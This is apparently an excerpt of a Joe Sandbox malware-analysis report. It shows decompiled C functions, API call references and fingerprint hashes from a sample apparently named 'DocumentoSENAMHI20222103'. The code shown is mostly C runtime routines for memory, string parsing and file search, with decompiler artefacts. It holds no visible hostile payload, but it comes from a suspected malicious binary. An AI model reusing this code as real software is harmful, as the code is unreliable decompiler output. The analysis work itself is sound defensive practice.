    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_150000_DocumentoSENAMHI20222103.jbxd
    Similarity
    • API ID: FreeLibrary
    • String ID: api-ms-
    • API String ID: 3664257935-2084034818
    • Opcode ID: cd0ea8e3436eb84ab1b84b1630c319059c80e6317cb55e5e965062515d971476
    • Instruction ID: f7f64846eb299a385587b30f329db7ca4c64af0a8dc2cccec103fd3d5cf69fa3
    • Opcode Fuzzy Hash: cd0ea8e3436eb84ab1b84b1630c319059c80e6317cb55e5e965062515d971476
    • Instruction Fuzzy Hash: EE11CA35A02625F7DB22CB68DC4679A73A4EF01772F650111ED21EF290D770ED4886D1
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 60%
    			E0015D164(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36) {
    				signed int _v8;
    				intOrPtr _v12;
    				void* _v24;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				signed int _t41;
    				signed int _t49;
    				void* _t51;
    				signed int _t55;
    				intOrPtr _t63;
    				intOrPtr _t69;
    				void* _t71;
    				intOrPtr* _t72;
    				intOrPtr _t86;
    				void* _t89;
    				intOrPtr* _t91;
    				intOrPtr _t93;
    				void* _t94;
    				void* _t95;
    				signed int _t96;
    				void* _t97;
    				intOrPtr* _t98;
    				intOrPtr* _t100;
    				void* _t103;
    
    				_push(__ecx);
    				_push(__ecx);
    				_t41 =  *0x169008; // 0x26a91022
    				_v8 = _t41 ^ _t96;
    				_t93 = _a20;
    				if(_t93 > 0) {
    					_t69 = E0015E5EF(_a16, _t93);
    					_t103 = _t69 - _t93;
    					_t4 = _t69 + 1; // 0x1
    					_t93 = _t4;
    					if(_t103 >= 0) {
    						_t93 = _t69;
    					}
    				}
    				_t88 = _a32;
    				if(_a32 == 0) {
    					_t88 =  *((intOrPtr*)( *_a4 + 8));
    					_a32 =  *((intOrPtr*)( *_a4 + 8));
    				}
    				_t86 = E0015B0CA(_t88, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t93, 0, 0);
    				_t98 = _t97 + 0x18;
    				_v12 = _t86;
    				if(_t86 == 0) {
    					L39:
    					_pop(_t89);
    					_pop(_t94);
    					_pop(_t71);
    					return E0015403C(_t46, _t71, _v8 ^ _t96, _t86, _t89, _t94);
    				} else {
    					_t17 = _t86 + _t86 + 8; // 0x8
    					asm("sbb eax, eax");
    					_t49 = _t86 + _t86 & _t17;
    					if(_t49 == 0) {
    						_t72 = 0;
    						L15:
    						if(_t72 == 0) {
    							L37:
    							_t95 = 0;
    							L38:
    							E0015BF54(_t72);
    							_t46 = _t95;
    							goto L39;
    						}
    						_t51 = E0015B0CA(_t88, 1, _a16, _t93, _t72, _t86);
    						_t100 = _t98 + 0x18;
    						if(_t51 == 0) {
    							goto L37;
    						}
    						_t90 = _v12;
    						_t95 = E001599EA(_a8, _a12, _t72, _v12, 0, 0, 0, 0, 0);
    						if(_t95 == 0) {
    							goto L37;
    						}
    						_t86 = 0x400;
    						if((_a12 & 0x00000400) == 0) {
    							_t31 = _t95 + _t95 + 8; // 0x8
    							asm("sbb eax, eax");
    							_t55 = _t95 + _t95 & _t31;
    							if(_t55 == 0) {
    								_t91 = 0;
    								L31:
    								if(_t91 == 0 || E001599EA(_a8, _a12, _t72, _v12, _t91, _t95, 0, 0, 0) == 0) {
    									L36:
    									E0015BF54(_t91);
    									goto L37;
    								} else {
    									_push(0);
    									_push(0);
    									if(_a28 != 0) {
    										_push(_a28);
    										_push(_a24);
    									} else {
    										_push(0);
    										_push(0);
    									}
    									_push(_t95);
    									_push(_t91);
    									_push(0);
    									_push(_a32);
    									_t95 = E0015B146();
    									if(_t95 != 0) {
    										E0015BF54(_t91);
    										goto L38;
    									} else {
    										goto L36;
    									}
    								}
    							}
    							if(_t55 > 0x400) {
    								_t91 = E00158BBC(_t55);
    								if(_t91 == 0) {
    									goto L36;
    								}
    								 *_t91 = 0xdddd;
    								L29:
    								_t91 = _t91 + 8;
    								goto L31;
    							}
    							E001602F0(_t55);
    							_t91 = _t100;
    							if(_t91 == 0) {
    								goto L36;
    							}
    							 *_t91 = 0xcccc;
    							goto L29;
    						}
    						_t63 = _a28;
    						if(_t63 == 0) {
    							goto L38;
    						}
    						if(_t95 > _t63) {
    							goto L37;
    						}
    						_t95 = E001599EA(_a8, _a12, _t72, _t90, _a24, _t63, 0, 0, 0);
    						if(_t95 != 0) {
    							goto L38;
    						}
    						goto L37;
    					}
    					if(_t49 > 0x400) {
    						_t72 = E00158BBC(_t49);
    						if(_t72 == 0) {
    							L13:
    							_t86 = _v12;
    							goto L15;
    						}
    						 *_t72 = 0xdddd;
    						L12:
    						_t72 = _t72 + 8;
    						goto L13;
    					}
    					E001602F0(_t49);
    					_t72 = _t98;
    					if(_t72 == 0) {
    						goto L13;
    					}
    					 *_t72 = 0xcccc;
    					goto L12;
    				}
    			}

    APIs
    • __alloca_probe_16.LIBCMT ref: 0015D1E8
    • __alloca_probe_16.LIBCMT ref: 0015D2AE
    • __freea.LIBCMT ref: 0015D31A
      • Part of subcall function 00158BBC: HeapAlloc.KERNEL32(00000000,00153522,?,?,00153CF2,0015352A,00000000,?,00153522,?), ref: 00158BEE
    • __freea.LIBCMT ref: 0015D323
    • __freea.LIBCMT ref: 0015D346
    Memory Dump Source
    • Source File: 00000000.00000002.921060002.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
    • Associated: 00000000.00000002.921053938.0000000000150000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921074420.0000000000161000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921082295.0000000000169000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921086723.000000000016A000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921797899.0000000000292000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921896034.0000000000293000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_150000_DocumentoSENAMHI20222103.jbxd
    Similarity
    • API ID: __freea$__alloca_probe_16$AllocHeap
    • String ID:
    • API String ID: 1096550386-0
    • Opcode ID: 702b0026eaa503b9fe66378444d1843bcc0c325ebb079cc2defb881ca82dddf7
    • Instruction ID: 53cfc8f2f656bb2da67ef4674ba1496fbff6096d343513d4175c2c7cf432d4e3
    • Opcode Fuzzy Hash: 702b0026eaa503b9fe66378444d1843bcc0c325ebb079cc2defb881ca82dddf7
    • Instruction Fuzzy Hash: 4351C1B2900216EBEB355FA4EC81EBB37A9EF54752F154129FC24AF140E730DC5987A1
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 96%
    			E00152327(CHAR** __ecx, CHAR* _a4) {
    				char* _v8;
    				CHAR** _v12;
    				char _t16;
    				void* _t17;
    				void* _t19;
    				void* _t20;
    				void* _t21;
    				CHAR* _t23;
    				CHAR* _t24;
    				CHAR* _t26;
    				CHAR* _t29;
    				CHAR* _t30;
    				CHAR* _t36;
    				CHAR* _t39;
    				void* _t40;
    				void* _t45;
    				char _t46;
    				CHAR* _t51;
    				char* _t56;
    				CHAR** _t58;
    				void* _t61;
    
    				_push(__ecx);
    				_push(__ecx);
    				_t58 = __ecx;
    				_v12 = __ecx;
    				E001522FE(__ecx);
    				_t36 =  *__ecx;
    				_t16 =  *_t36;
    				if(_t16 == 0) {
    					L27:
    					_t17 = 0x80020009;
    				} else {
    					_t56 = _a4;
    					_v8 = _t56;
    					if(_t16 != 0x27) {
    						while(1) {
    							_t19 = _t16 - 9;
    							if(_t19 == 0) {
    								break;
    							}
    							_t20 = _t19 - 1;
    							if(_t20 == 0) {
    								break;
    							} else {
    								_t21 = _t20 - 3;
    								if(_t21 == 0 || _t21 == 0x13) {
    									break;
    								} else {
    									_t23 = CharNextA(_t36);
    									 *_t58 = _t23;
    									_t24 = _t23 - _t36;
    									_a4 = _t24;
    									if(_t56 + 1 + _t24 >= _v8 + 0x1000) {
    										goto L27;
    									} else {
    										_t45 = 0;
    										if(_t24 > 0) {
    											_t51 = _t24;
    											do {
    												 *_t56 = _t36[_t45];
    												_t56 = _t56 + 1;
    												_t45 = _t45 + 1;
    											} while (_t45 < _t51);
    										}
    										_t36 =  *_t58;
    										_t16 =  *_t36;
    										if(_t16 != 0) {
    											continue;
    										} else {
    											break;
    										}
    									}
    								}
    							}
    							goto L28;
    						}
    						 *_t56 = 0;
    						goto L26;
    					} else {
    						_t26 = CharNextA(_t36);
    						 *_t58 = _t26;
    						_t46 =  *_t26;
    						if(_t46 == 0) {
    							L14:
    							if( *( *_t58) == 0) {
    								goto L27;
    							} else {
    								 *_t56 = 0;
    								 *_t58 = CharNextA( *_t58);
    								L26:
    								_t17 = 0;
    							}
    						} else {
    							while(_t46 != 0x27 ||  *(CharNextA(_t26)) == 0x27) {
    								_t29 =  *_t58;
    								if( *_t29 == 0x27) {
    									 *_t58 = CharNextA(_t29);
    								}
    								_t30 =  *_t58;
    								_a4 = _t30;
    								_t39 = CharNextA(_t30);
    								 *_t58 = _t39;
    								_t40 = _t39 - _a4;
    								if(_t56 + 1 + _t40 >= _v8 + 0x1000) {
    									goto L27;
    								} else {
    									if(_t40 > 0) {
    										_t61 = _a4 - _t56;
    										do {
    											 *_t56 =  *((intOrPtr*)(_t61 + _t56));
    											_t56 = _t56 + 1;
    											_t40 = _t40 - 1;
    										} while (_t40 != 0);
    										_t58 = _v12;
    									}
    									_t26 =  *_t58;
    									_t46 =  *_t26;
    									if(_t46 == 0) {
    										goto L27;
    									} else {
    										continue;
    									}
    								}
    								goto L28;
    							}
    							goto L14;
    						}
    					}
    				}
    				L28:
    				return _t17;
    			}

    APIs
      • Part of subcall function 001522FE: CharNextA.USER32(?,?,00152339,?,00000000,00000000,?,?,?,00152CA6,?,00000000,?,00000000,00000000,?), ref: 0015231B
    • CharNextA.USER32(00000000,?,00000000,00000000,?,?,?,00152CA6,?,00000000,?,00000000,00000000,?), ref: 0015235A
    • CharNextA.USER32(00000000,?,00000000,00000000,?,?,?,00152CA6,?,00000000,?,00000000,00000000,?), ref: 0015236A
    • CharNextA.USER32(00000000,?,00000000,00000000,?,?,?,00152CA6,?,00000000,?,00000000,00000000,?), ref: 00152379
    • CharNextA.USER32(00000000,?,00000000,00000000,?,?,?,00152CA6,?,00000000,?,00000000,00000000,?), ref: 00152383
    • CharNextA.USER32(?,?,00000000,00000000,?,?,?,00152CA6,?,00000000,?,00000000,00000000,?), ref: 001523D5
    • CharNextA.USER32(00000000,?,00000000,00000000,?,?,?,00152CA6,?,00000000,?,00000000,00000000,?), ref: 001523F3
    Memory Dump Source
    • Source File: 00000000.00000002.921060002.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
    • Associated: 00000000.00000002.921053938.0000000000150000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921074420.0000000000161000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921082295.0000000000169000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921086723.000000000016A000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921797899.0000000000292000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921896034.0000000000293000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_150000_DocumentoSENAMHI20222103.jbxd
    Similarity
    • API ID: CharNext
    • String ID:
    • API String ID: 3213498283-0
    • Opcode ID: 09c63ef6e9780a3c13462a3da479eab22ea1f7d26978d86ab0984c14f2f371ea
    • Instruction ID: d200bf5062a859741b89794f133bbb192ad9c9218d84d00d3cee6fc6802c5bb9
    • Opcode Fuzzy Hash: 09c63ef6e9780a3c13462a3da479eab22ea1f7d26978d86ab0984c14f2f371ea
    • Instruction Fuzzy Hash: 5941E036500282DFDB268F39C8946A9BBE4AF2B342F28456CD8D5DF306D3749C89C760
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0015BCA8(intOrPtr* _a4) {
    				intOrPtr _t6;
    				intOrPtr* _t21;
    				void* _t23;
    				void* _t24;
    				void* _t25;
    				void* _t26;
    				void* _t27;
    
    				_t21 = _a4;
    				if(_t21 != 0) {
    					_t23 =  *_t21 -  *0x1696e8; // 0x169738
    					if(_t23 != 0) {
    						E00158B82(_t7);
    					}
    					_t24 =  *((intOrPtr*)(_t21 + 4)) -  *0x1696ec; // 0x292dd8
    					if(_t24 != 0) {
    						E00158B82(_t8);
    					}
    					_t25 =  *((intOrPtr*)(_t21 + 8)) -  *0x1696f0; // 0x292dd8
    					if(_t25 != 0) {
    						E00158B82(_t9);
    					}
    					_t26 =  *((intOrPtr*)(_t21 + 0x30)) -  *0x169718; // 0x16973c
    					if(_t26 != 0) {
    						E00158B82(_t10);
    					}
    					_t6 =  *((intOrPtr*)(_t21 + 0x34));
    					_t27 = _t6 -  *0x16971c; // 0x292ddc
    					if(_t27 != 0) {
    						return E00158B82(_t6);
    					}
    				}
    				return _t6;
    			}

    APIs
    • _free.LIBCMT ref: 0015BCC0
      • Part of subcall function 00158B82: HeapFree.KERNEL32(00000000,00000000,?,0015BD3B,?,00000000,?,?,?,0015BD62,?,00000007,?,?,0015C188,?), ref: 00158B98
      • Part of subcall function 00158B82: GetLastError.KERNEL32(?,?,0015BD3B,?,00000000,?,?,?,0015BD62,?,00000007,?,?,0015C188,?,?), ref: 00158BAA
    • _free.LIBCMT ref: 0015BCD2
    • _free.LIBCMT ref: 0015BCE4
    • _free.LIBCMT ref: 0015BCF6
    • _free.LIBCMT ref: 0015BD08
    Memory Dump Source
    • Source File: 00000000.00000002.921060002.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
    • Associated: 00000000.00000002.921053938.0000000000150000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921074420.0000000000161000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921082295.0000000000169000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921086723.000000000016A000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921797899.0000000000292000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921896034.0000000000293000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_150000_DocumentoSENAMHI20222103.jbxd
    Similarity
    • API ID: _free$ErrorFreeHeapLast
    • String ID:
    • API String ID: 776569668-0
    • Opcode ID: 586df1216655d68b17ac752f56920e282ee325f6333ec0562997423db554ffde
    • Instruction ID: b6d4fb4acae28133cd27455cc7286a2f75463b8fb4008e21e948be1a4041cfee
    • Opcode Fuzzy Hash: 586df1216655d68b17ac752f56920e282ee325f6333ec0562997423db554ffde
    • Instruction Fuzzy Hash: 7EF0FFB2518204EFCA20EF58E9C2C5673EDAB107677584905F825EB911CF70FC848A54
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 80%
    			E0015A03C(void* __esi, signed int* _a4, signed int _a8, intOrPtr _a12) {
    				intOrPtr _v0;
    				signed int _v6;
    				signed int _v8;
    				signed int _v12;
    				signed int _v16;
    				intOrPtr _v20;
    				intOrPtr _v24;
    				signed int _v28;
    				signed int _v32;
    				signed int _v36;
    				signed int _v40;
    				intOrPtr* _v72;
    				intOrPtr* _v104;
    				intOrPtr* _v108;
    				intOrPtr _v112;
    				signed int _v124;
    				struct _WIN32_FIND_DATAW _v608;
    				char _v609;
    				intOrPtr* _v616;
    				union _FINDEX_INFO_LEVELS _v620;
    				union _FINDEX_INFO_LEVELS _v624;
    				union _FINDEX_INFO_LEVELS _v628;
    				signed int _v632;
    				union _FINDEX_INFO_LEVELS _v636;
    				union _FINDEX_INFO_LEVELS _v640;
    				signed int _v644;
    				signed int _v648;
    				union _FINDEX_INFO_LEVELS _v652;
    				union _FINDEX_INFO_LEVELS _v656;
    				union _FINDEX_INFO_LEVELS _v660;
    				union _FINDEX_INFO_LEVELS _v664;
    				signed int _v668;
    				union _FINDEX_INFO_LEVELS _v672;
    				union _FINDEX_INFO_LEVELS _v676;
    				intOrPtr _v724;
    				void* __ebx;
    				void* __edi;
    				intOrPtr* _t131;
    				signed int _t132;
    				signed int _t134;
    				signed int _t139;
    				signed int _t140;
    				intOrPtr* _t150;
    				signed int _t152;
    				intOrPtr _t153;
    				signed int _t157;
    				signed int _t159;
    				signed int _t164;
    				signed int _t166;
    				char _t168;
    				signed char _t169;
    				signed int _t175;
    				union _FINDEX_INFO_LEVELS _t179;
    				signed int _t185;
    				union _FINDEX_INFO_LEVELS _t188;
    				intOrPtr* _t196;
    				signed int _t199;
    				intOrPtr _t204;
    				signed int _t206;
    				signed int _t209;
    				signed int _t211;
    				signed int _t212;
    				signed int _t213;
    				signed int _t215;
    				signed int _t217;
    				signed int _t218;
    				signed int* _t219;
    				signed int _t222;
    				void* _t225;
    				union _FINDEX_INFO_LEVELS _t226;
    				void* _t227;
    				intOrPtr _t229;
    				signed int _t232;
    				signed int _t233;
    				signed int _t234;
    				signed int _t236;
    				intOrPtr* _t239;
    				signed int _t241;
    				intOrPtr* _t244;
    				signed int _t249;
    				signed int _t255;
    				signed int _t257;
    				signed int _t263;
    				intOrPtr* _t264;
    				signed int _t272;
    				signed int _t274;
    				intOrPtr* _t275;
    				void* _t277;
    				signed int _t280;
    				signed int _t283;
    				signed int _t285;
    				intOrPtr _t287;
    				void* _t288;
    				signed int* _t292;
    				signed int _t293;
    				signed int _t295;
    				signed int _t296;
    				signed int _t297;
    				signed int _t299;
    				void* _t300;
    				void* _t301;
    				signed int _t302;
    				void* _t306;
    				signed int _t307;
    				void* _t308;
    				void* _t309;
    				void* _t310;
    				signed int _t311;
    				void* _t312;
    				void* _t313;
    
    				_t131 = _a8;
    				_t309 = _t308 - 0x28;
    				_push(__esi);
    				_t317 = _t131;
    				if(_t131 != 0) {
    					_t292 = _a4;
    					_t222 = 0;
    					 *_t131 = 0;
    					_t283 = 0;
    					_t132 =  *_t292;
    					_t232 = 0;
    					_v608.cAlternateFileName = 0;
    					_v40 = 0;
    					_v36 = 0;
    					__eflags = _t132;
    					if(_t132 == 0) {
    						L9:
    						_v8 = _t222;
    						_t134 = _t232 - _t283;
    						_t293 = _t283;
    						_v12 = _t293;
    						_t271 = (_t134 >> 2) + 1;
    						_t136 = _t134 + 3 >> 2;
    						__eflags = _t232 - _t293;
    						_v16 = (_t134 >> 2) + 1;
    						asm("sbb esi, esi");
    						_t295 =  !_t293 & _t134 + 0x00000003 >> 0x00000002;
    						__eflags = _t295;
    						if(_t295 != 0) {
    							_t213 = _t283;
    							_t280 = _t222;
    							do {
    								_t264 =  *_t213;
    								_t20 = _t264 + 1; // 0x1
    								_v20 = _t20;
    								do {
    									_t215 =  *_t264;
    									_t264 = _t264 + 1;
    									__eflags = _t215;
    								} while (_t215 != 0);
    								_t222 = _t222 + 1 + _t264 - _v20;
    								_t213 = _v12 + 4;
    								_t280 = _t280 + 1;
    								_v12 = _t213;
    								__eflags = _t280 - _t295;
    							} while (_t280 != _t295);
    							_t271 = _v16;
    							_v8 = _t222;
    							_t222 = 0;
    							__eflags = 0;
    						}
    						_t296 = E00157F8F(_t136, _t271, _v8, 1);
    						_t310 = _t309 + 0xc;
    						__eflags = _t296;
    						if(_t296 != 0) {
    							_v12 = _t283;
    							_t139 = _t296 + _v16 * 4;
    							_t233 = _t139;
    							_v28 = _t139;
    							_t140 = _t283;
    							_v16 = _t233;
    							__eflags = _t140 - _v40;
    							if(_t140 == _v40) {
    								L24:
    								_v12 = _t222;
    								 *_a8 = _t296;
    								_t297 = _t222;
    								goto L25;
    							} else {
    								_t274 = _t296 - _t283;
    								__eflags = _t274;
    								_v32 = _t274;
    								do {
    									_t150 =  *_t140;
    									_t275 = _t150;
    									_v24 = _t150;
    									_v20 = _t275 + 1;
    									do {
    										_t152 =  *_t275;
    										_t275 = _t275 + 1;
    										__eflags = _t152;
    									} while (_t152 != 0);
    									_t153 = _t275 - _v20 + 1;
    									_push(_t153);
    									_v20 = _t153;
    									_t157 = E0015CB84(_t233, _v28 - _t233 + _v8, _v24);
    									_t310 = _t310 + 0x10;
    									__eflags = _t157;
    									if(_t157 != 0) {
    										_push(_t222);
    										_push(_t222);
    										_push(_t222);
    										_push(_t222);
    										_push(_t222);
    										E0015749C();
    										asm("int3");
    										_t306 = _t310;
    										_push(_t233);
    										_t239 = _v72;
    										_t65 = _t239 + 1; // 0x1
    										_t277 = _t65;
    										do {
    											_t159 =  *_t239;
    											_t239 = _t239 + 1;
    											__eflags = _t159;
    										} while (_t159 != 0);
    										_push(_t283);
    										_t285 = _a8;
    										_t241 = _t239 - _t277 + 1;
    										_v12 = _t241;
    										__eflags = _t241 -  !_t285;
    										if(_t241 <=  !_t285) {
    											_push(_t222);
    											_push(_t296);
    											_t68 = _t285 + 1; // 0x1
    											_t225 = _t68 + _t241;
    											_t300 = E00159E27(_t225, 1);
    											__eflags = _t285;
    											if(_t285 == 0) {
    												L40:
    												_push(_v12);
    												_t225 = _t225 - _t285;
    												_t164 = E0015CB84(_t300 + _t285, _t225, _v0);
    												_t311 = _t310 + 0x10;
    												__eflags = _t164;
    												if(_t164 != 0) {
    													goto L45;
    												} else {
    													_t229 = _a12;
    													_t206 = E0015A626(_t229);
    													_v12 = _t206;
    													__eflags = _t206;
    													if(_t206 == 0) {
    														 *( *(_t229 + 4)) = _t300;
    														_t302 = 0;
    														_t77 = _t229 + 4;
    														 *_t77 =  *(_t229 + 4) + 4;
    														__eflags =  *_t77;
    													} else {
    														E00158B82(_t300);
    														_t302 = _v12;
    													}
    													E00158B82(0);
    													_t209 = _t302;
    													goto L37;
    												}
    											} else {
    												_push(_t285);
    												_t211 = E0015CB84(_t300, _t225, _a4);
    												_t311 = _t310 + 0x10;
    												__eflags = _t211;
    												if(_t211 != 0) {
    													L45:
    													_push(0);
    													_push(0);
    													_push(0);
    													_push(0);
    													_push(0);
    													E0015749C();
    													asm("int3");
    													_push(_t306);
    													_t307 = _t311;
    													_t312 = _t311 - 0x298;
    													_t166 =  *0x169008; // 0x26a91022
    													_v124 = _t166 ^ _t307;
    													_t244 = _v108;
    													_t278 = _v104;
    													_push(_t225);
    													_push(0);
    													_t287 = _v112;
    													_v724 = _t278;
    													__eflags = _t244 - _t287;
    													if(_t244 != _t287) {
    														while(1) {
    															_t204 =  *_t244;
    															__eflags = _t204 - 0x2f;
    															if(_t204 == 0x2f) {
    																break;
    															}
    															__eflags = _t204 - 0x5c;
    															if(_t204 != 0x5c) {
    																__eflags = _t204 - 0x3a;
    																if(_t204 != 0x3a) {
    																	_t244 = E0015D0C0(_t287, _t244);
    																	__eflags = _t244 - _t287;
    																	if(_t244 != _t287) {
    																		continue;
    																	}
    																}
    															}
    															break;
    														}
    														_t278 = _v616;
    													}
    													_t168 =  *_t244;
    													_v609 = _t168;
    													__eflags = _t168 - 0x3a;
    													if(_t168 != 0x3a) {
    														L56:
    														_t226 = 0;
    														__eflags = _t168 - 0x2f;
    														if(__eflags == 0) {
    															L59:
    															_t169 = 1;
    														} else {
    															__eflags = _t168 - 0x5c;
    															if(__eflags == 0) {
    																goto L59;
    															} else {
    																__eflags = _t168 - 0x3a;
    																_t169 = 0;
    																if(__eflags == 0) {
    																	goto L59;
    																}
    															}
    														}
    														_v676 = _t226;
    														_v672 = _t226;
    														_push(_t300);
    														asm("sbb eax, eax");
    														_v668 = _t226;
    														_v664 = _t226;
    														_v644 =  ~(_t169 & 0x000000ff) & _t244 - _t287 + 0x00000001;
    														_v660 = _t226;
    														_v656 = _t226;
    														_t175 = E0015A01F(_t244 - _t287 + 1, _t287,  &_v676, E0015A533(_t278, __eflags));
    														_t313 = _t312 + 0xc;
    														asm("sbb eax, eax");
    														_t179 = FindFirstFileExW( !( ~_t175) & _v668, _t226,  &_v608, _t226, _t226, _t226);
    														_t301 = _t179;
    														__eflags = _t301 - 0xffffffff;
    														if(_t301 != 0xffffffff) {
    															_t249 =  *((intOrPtr*)(_v616 + 4)) -  *_v616;
    															__eflags = _t249;
    															_v648 = _t249 >> 2;
    															do {
    																_v640 = _t226;
    																_v636 = _t226;
    																_v632 = _t226;
    																_v628 = _t226;
    																_v624 = _t226;
    																_v620 = _t226;
    																_t185 = E00159F50( &(_v608.cFileName),  &_v640,  &_v609, E0015A533(_t278, __eflags));
    																_t313 = _t313 + 0x10;
    																asm("sbb eax, eax");
    																_t188 =  !( ~_t185) & _v632;
    																__eflags =  *_t188 - 0x2e;
    																if( *_t188 != 0x2e) {
    																	L67:
    																	_push(_v616);
    																	_push(_v644);
    																	_push(_t287);
    																	_push(_t188);
    																	L33();
    																	_t313 = _t313 + 0x10;
    																	_v652 = _t188;
    																	__eflags = _t188;
    																	if(_t188 != 0) {
    																		__eflags = _v620 - _t226;
    																		if(_v620 != _t226) {
    																			E00158B82(_v632);
    																			_t188 = _v652;
    																		}
    																		_t226 = _t188;
    																	} else {
    																		goto L68;
    																	}
    																} else {
    																	_t255 =  *((intOrPtr*)(_t188 + 1));
    																	__eflags = _t255;
    																	if(_t255 == 0) {
    																		goto L68;
    																	} else {
    																		__eflags = _t255 - 0x2e;
    																		if(_t255 != 0x2e) {
    																			goto L67;
    																		} else {
    																			__eflags =  *((intOrPtr*)(_t188 + 2)) - _t226;
    																			if( *((intOrPtr*)(_t188 + 2)) == _t226) {
    																				goto L68;
    																			} else {
    																				goto L67;
    																			}
    																		}
    																	}
    																}
    																L76:
    																FindClose(_t301);
    																goto L77;
    																L68:
    																__eflags = _v620 - _t226;
    																if(_v620 != _t226) {
    																	E00158B82(_v632);
    																}
    																__eflags = FindNextFileW(_t301,  &_v608);
    															} while (__eflags != 0);
    															_t196 = _v616;
    															_t257 = _v648;
    															_t278 =  *_t196;
    															_t199 =  *((intOrPtr*)(_t196 + 4)) -  *_t196 >> 2;
    															__eflags = _t257 - _t199;
    															if(_t257 != _t199) {
    																E0015CB90(_t278, _t278 + _t257 * 4, _t199 - _t257, 4, E00159E84);
    															}
    															goto L76;
    														} else {
    															_push(_v616);
    															_push(_t226);
    															_push(_t226);
    															_push(_t287);
    															L33();
    															_t226 = _t179;
    														}
    														L77:
    														__eflags = _v656;
    														_pop(_t300);
    														if(_v656 != 0) {
    															E00158B82(_v668);
    														}
    														_t190 = _t226;
    													} else {
    														_t190 = _t287 + 1;
    														__eflags = _t244 - _t287 + 1;
    														if(_t244 == _t287 + 1) {
    															_t168 = _v609;
    															goto L56;
    														} else {
    															_push(_t278);
    															_push(0);
    															_push(0);
    															_push(_t287);
    															L33();
    														}
    													}
    													_pop(_t288);
    													__eflags = _v16 ^ _t307;
    													_pop(_t227);
    													return E0015403C(_t190, _t227, _v16 ^ _t307, _t278, _t288, _t300);
    												} else {
    													goto L40;
    												}
    											}
    										} else {
    											_t209 = 0xc;
    											L37:
    											return _t209;
    										}
    									} else {
    										goto L23;
    									}
    									goto L81;
    									L23:
    									_t212 = _v12;
    									_t263 = _v16;
    									 *((intOrPtr*)(_v32 + _t212)) = _t263;
    									_t140 = _t212 + 4;
    									_t233 = _t263 + _v20;
    									_v16 = _t233;
    									_v12 = _t140;
    									__eflags = _t140 - _v40;
    								} while (_t140 != _v40);
    								goto L24;
    							}
    						} else {
    							_t297 = _t296 | 0xffffffff;
    							_v12 = _t297;
    							L25:
    							E00158B82(_t222);
    							_pop(_t234);
    							goto L26;
    						}
    					} else {
    						while(1) {
    							_v8 = 0x3f2a;
    							_v6 = _t222;
    							_t217 = E0015D080(_t132,  &_v8);
    							_t234 =  *_t292;
    							__eflags = _t217;
    							if(_t217 != 0) {
    								_push( &(_v608.cAlternateFileName));
    								_push(_t217);
    								_push(_t234);
    								L46();
    								_t309 = _t309 + 0xc;
    								_v12 = _t217;
    								_t297 = _t217;
    							} else {
    								_t218 =  &(_v608.cAlternateFileName);
    								_push(_t218);
    								_push(_t222);
    								_push(_t222);
    								_push(_t234);
    								L33();
    								_t297 = _t218;
    								_t309 = _t309 + 0x10;
    								_v12 = _t297;
    							}
    							__eflags = _t297;
    							if(_t297 != 0) {
    								break;
    							}
    							_t292 =  &(_a4[1]);
    							_a4 = _t292;
    							_t132 =  *_t292;
    							__eflags = _t132;
    							if(_t132 != 0) {
    								continue;
    							} else {
    								_t283 = _v608.cAlternateFileName;
    								_t232 = _v40;
    								goto L9;
    							}
    							goto L81;
    						}
    						_t283 = _v608.cAlternateFileName;
    						L26:
    						_t272 = _t283;
    						_v32 = _t272;
    						__eflags = _v40 - _t272;
    						asm("sbb ecx, ecx");
    						_t236 =  !_t234 & _v40 - _t272 + 0x00000003 >> 0x00000002;
    						__eflags = _t236;
    						_v28 = _t236;
    						if(_t236 != 0) {
    							_t299 = _t236;
    							do {
    								E00158B82( *_t283);
    								_t222 = _t222 + 1;
    								_t283 = _t283 + 4;
    								__eflags = _t222 - _t299;
    							} while (_t222 != _t299);
    							_t283 = _v608.cAlternateFileName;
    							_t297 = _v12;
    						}
    						E00158B82(_t283);
    						goto L31;
    					}
    				} else {
    					_t219 = E001575D4(_t317);
    					_t297 = 0x16;
    					 *_t219 = _t297;
    					E0015748C();
    					L31:
    					return _t297;
    				}
    				L81:
    			}

    Similarity
    • API ID: _free
    • String ID: *?
    • API String ID: 269201875-2564092906
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 92%
